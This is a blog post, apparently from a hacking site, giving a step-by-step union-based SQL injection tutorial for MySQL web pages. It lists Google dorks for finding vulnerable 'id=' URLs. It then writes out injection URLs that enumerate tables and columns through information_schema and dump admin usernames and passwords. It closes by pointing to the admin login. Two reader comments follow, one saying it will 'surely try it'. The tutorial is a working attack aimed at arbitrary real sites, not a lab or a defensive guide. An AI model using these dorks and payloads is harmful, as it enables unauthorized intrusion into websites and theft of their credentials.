Keyword you need to know
-------------------------------
Character : ', -
Comments : /*, --
-------------------------------
Information: "Information_schema" just working our for version 5.x and above
Google Dork that will be used is ->
"inurl:news.php?id="
"inurl:index.php?id="
"inurl:trainers.php?id="
"inurl:buy.php?category="
"news-article.php?id="
"inurl:article.php?ID="
-------------------------First Step-------------------------
www.target.com/news.php?id=1
---add the character 'at the end of the url to see if the site is vuln to
sql injection or not.
inject sample code:-
www.target.com/news.php?id=1'
or
www.target.com/news.php?id=-1
Examples of error messages :-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near line 1
warning: mysql_fetch_array(): supplied argument is not a valid MYSQL
result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line
-------------------------Second Step-------------------------
Find the number of tables available in the database.
Add : +order+by+1-- at the end of url
Contoh:
Code:
www.target.com/news.php?id=1+order+by+1--
atau
www.target.com/news.php?id=1+order+by+1/* check in stages
www.target.com/news.php?id=1+order+by+2/*
www.target.com/news.php?id=1+order+by+3/* keep looking untill error out
For this tutorial table amount obtained was 3.
-------------------------Third Step-------------------------
Use the Union command to remove the numbers that we use later.
order to be used : +union+select+1,2,3-- end of the url
Example
www.target.com/news.php?id=1+union+select+1,2,3--
Example: number 2 out.
then we enter the version() in number (2),
Example:
www.target.com/news.php?id=1+union+select+1,version(),3--
and the display version will appear in the figures.
Example:
5.1.47-community-log
------
|info|
------
version() = to see msql version used
database() = to see the database name used
-------------------------Fourth Step-------------------------
to see, the names of the table that is in the web, order
table_name park in the figures that came out earlier -> (2)
+from+information_schema.tables-- ---> park behind the last digit.
Example:
www.target.com/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--
or we add the command character- in front of the first digit
www.target.com/news.php?id=-1+union+select+1,table_name,3+from+information_schema.tables--
-------------------------Step Fifth-------------------------
Remove all content is in the table,
group_concat(table_name) ---> park in the figures that came out earlier (2)
+from+information_schema.tables+where+table_schema=database()-- ---> Put after the last digit.
Contoh:
www.target.com/news.php?id=1+union+select+1,group_concat(table_name),3+from+
information_schema.tables+where+table_schema=database()--
-------------------------Step Sixth-------------------------
Exit right content is in TABLE
group_concat(column_name) ---> park in the figures that came out earlier (2)
+from+information_schema.columns+where+table_name=0xResulOfConvertedTextTableAdmin--
(TABLE NAME HAS BEEN PUT IN TO CONVERT HEXADECIMEL)
------
|info|
------
Website that can be used to convert the table name to hexadecimel
-----> www.piclist.com/techref/ascii.htm
-----> www.centricle.com/tools/ascii-hex/
Column which we will use as example the table ADMIN
and convert results are 41444D494E
Example:
www.target.com/news.php?id=1+union+select+1,group_concat(column_name),3+from+
information_schema.columns+where+table_name=0x41444D494E--
-------------------------Step Seven-------------------------
Remove the contents of the results that we managed to get from table Admin
concat_ws(0x3a,"column names contained in the table ADMIN") ---> park in the figures that came out earlier (2)
+from+Admin-- --> The original column
Contoh:
www.target.com/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+Admin--
And we obtain the username and password admin for the website.
Then You Has o Find The Admin Login :)....
More Short Tutorial:-
http://pastebin.com/pVVjSzhF
Categories:
SQL
,
Web Hacking
2 comments :
Thanks to provide information about SQL injection implementation, i will surely try it.
Hello all,I am new to this forum and I would like to ask that what are the benefits of sql training, what all topics should be covered and it is kinda bothering me ... and has anyone studies from this course wiziq.com/course/125-comprehensive-introduction-to-sql of SQL tutorial online?? or tell me any other guidance...
would really appreciate help... and Also i would like to thank for all the information you are providing on sql.
Post a Comment